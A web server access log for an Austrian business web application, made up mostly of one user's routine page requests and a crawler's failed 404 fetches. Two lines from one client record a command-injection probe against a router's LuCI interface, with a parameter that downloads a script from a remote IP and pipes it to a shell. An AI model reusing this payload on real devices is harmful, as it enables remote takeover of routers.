178.165.167.123 - - [17/Oct/2024:08:23:29 +0200] "GET /entry.php?id=10271&&ser=146148 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:23:29 +0200] "GET /gui/javascript/form_form.js?1729146209 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146148" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [17/Oct/2024:08:23:48 +0200] "GET /renault.activities.at/htdocs/log/cron/autologout_3116515.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:24:10 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/201910161303_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:24:29 +0200] "GET /entry.php?id=10271&&ser=146209 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146148" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:24:29 +0200] "GET /gui/javascript/form_form.js?1729146269 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146209" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [17/Oct/2024:08:24:31 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912091403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [17/Oct/2024:08:24:52 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11228337.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:25:13 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910291103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:25:30 +0200] "GET /entry.php?id=10271&&ser=146269 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146209" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:25:30 +0200] "GET /gui/javascript/form_form.js?1729146330 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146269" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [17/Oct/2024:08:25:35 +0200] "GET /renault.2web.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [17/Oct/2024:08:25:56 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11470760.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [17/Oct/2024:08:26:17 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11076605.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:26:30 +0200] "GET /entry.php?id=10271&&ser=146330 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146269" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:26:30 +0200] "GET /gui/javascript/form_form.js?1729146390 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146330" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [17/Oct/2024:08:26:38 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12493116.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [17/Oct/2024:08:26:59 +0200] "GET /hausegger.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:27:20 +0200] "GET /renault.activities.at/htdocs/log/cron/pickupLogisticData_3116559.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:27:30 +0200] "GET /entry.php?id=10271&&ser=146390 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146330" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:27:31 +0200] "GET /gui/javascript/form_form.js?1729146450 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146390" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [17/Oct/2024:08:27:41 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12433389.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:28:02 +0200] "GET /ed-test.activities.at/stats/lang/awstats-ca.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:28:24 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11725116.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:28:31 +0200] "GET /entry.php?id=10271&&ser=146450 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146390" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:28:31 +0200] "GET /gui/javascript/form_form.js?1729146511 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146450" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [17/Oct/2024:08:28:45 +0200] "GET /hausegger.activities.at/stats/lang/tooltips_m/awstats-tt-en.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [17/Oct/2024:08:29:06 +0200] "GET /renault.2web.at/htdocs/binaries/10126848.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:29:27 +0200] "GET /renault.2web.at/stats/lang/awstats-nb.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:29:31 +0200] "GET /entry.php?id=10271&&ser=146511 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=146450" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:29:31 +0200] "GET /gui/javascript/form_form.js?1729146571 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146511" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [17/Oct/2024:08:29:48 +0200] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-tw.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:30:09 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005150903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:30:31 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/202109071003_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:30:31 +0200] "GET /entry.php?id=10271&&ser=146571 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146511" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:30:32 +0200] "GET /gui/javascript/form_form.js?1729146631 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146571" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [17/Oct/2024:08:30:51 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102161003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:31:12 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011161303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:31:15 +0200] "GET /entry.php?id=10712 HTTP/1.1" 200 402 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:15 +0200] "GET /entry.php?id=10715& HTTP/1.1" 200 2534 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:15 +0200] "GET /entry.php?id=10676&&title=Artikelverwaltung HTTP/1.1" 200 1393 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:16 +0200] "GET /gui/javascript/form_form.js?1729146676 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:15 +0200] "GET /entry.php?id=10716& HTTP/1.1" 200 4886 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:16 +0200] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2179 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:16 +0200] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 2691 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:16 +0200] "GET /activities/framework/fwx_trans.gif HTTP/1.1" 200 43 "http://hausegger.activities.at/entry.php?id=10716&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:16 +0200] "GET /entry.php?id=10714&checksegmentation=false& HTTP/1.1" 200 4150 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:16 +0200] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:16 +0200] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:21 +0200] "POST /entry.php?id=10715 HTTP/1.1" 200 2606 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:21 +0200] "GET /gui/javascript/form_form.js?1729146681 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:21 +0200] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2308 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:21 +0200] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 2994 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:21 +0200] "GET /gui/images/icons/order.gif HTTP/1.1" 200 353 "http://hausegger.activities.at/entry.php?id=10778&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:21 +0200] "GET /gui/images/icons/isvisible.gif HTTP/1.1" 200 1015 "http://hausegger.activities.at/entry.php?id=10778&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:21 +0200] "GET /gui/images/no_image_de.jpg HTTP/1.1" 200 73407 "http://hausegger.activities.at/entry.php?id=10778&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:23 +0200] "POST /entry.php?id=10716 HTTP/1.1" 200 7736 "http://hausegger.activities.at/entry.php?id=10716&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:23 +0200] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:23 +0200] "GET /gui/javascript/form_form.js?1729146683 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:23 +0200] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:23 +0200] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:28 +0200] "POST /entry.php?id=10715 HTTP/1.1" 200 2607 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:28 +0200] "GET /gui/javascript/form_form.js?1729146688 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:28 +0200] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2308 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:28 +0200] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 2994 "http://hausegger.activities.at/entry.php?id=10715" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:30 +0200] "POST /entry.php?id=10716 HTTP/1.1" 200 7737 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:30 +0200] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:30 +0200] "GET /gui/javascript/form_form.js?1729146690 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:30 +0200] "GET /activities/framework/KoolControls/KoolComboBox/koolcombobox.php?32981a13284db7a021131df49e6cd203 HTTP/1.1" 200 4607 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:31 +0200] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10716" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:32 +0200] "GET /entry.php?id=10271&&ser=146631 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146571" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:31:32 +0200] "GET /gui/javascript/form_form.js?1729146692 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146631" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [17/Oct/2024:08:31:33 +0200] "GET /default/cgi-bin/lang/awstats-de.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:31:54 +0200] "GET /renault.activities.at/htdocs/export/txt/factura/FacturaExport20201216071646.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:32:15 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010141603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:32:32 +0200] "GET /entry.php?id=10271&&ser=146692 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146631" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:32:32 +0200] "GET /gui/javascript/form_form.js?1729146752 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146692" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [17/Oct/2024:08:32:36 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11044938.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:32:58 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007301303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:33:19 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/202009161203_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:33:33 +0200] "GET /entry.php?id=10271&&ser=146752 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146692" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:33:33 +0200] "GET /gui/javascript/form_form.js?1729146813 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146752" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [17/Oct/2024:08:33:40 +0200] "GET /ed-test.activities.at/stats/lang/tooltips_m/awstats-tt-fr.txt HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:34:02 +0200] "GET /hausegger.activities.at/stats/lang/tooltips_w/awstats-tt-kr.txt HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.67 - - [17/Oct/2024:08:34:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [17/Oct/2024:08:34:23 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110131003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.67 - - [17/Oct/2024:08:34:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.165.167.123 - - [17/Oct/2024:08:34:33 +0200] "GET /entry.php?id=10271&&ser=146813 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146752" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:34:33 +0200] "GET /gui/javascript/form_form.js?1729146873 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146813" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [17/Oct/2024:08:34:43 +0200] "GET /renault.activities.at/htdocs/log/emu/debug.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:35:05 +0200] "GET /default/cgi-bin/lang/awstats-is.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [17/Oct/2024:08:35:26 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115359.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.167.123 - - [17/Oct/2024:08:35:33 +0200] "GET /entry.php?id=10271&&ser=146873 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=146813" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.167.123 - - [17/Oct/2024:08:35:33 +0200] "GET /gui/javascript/form_form.js?1729146933 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=146873" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [17/Oct/2024:08:35:47 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115277.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
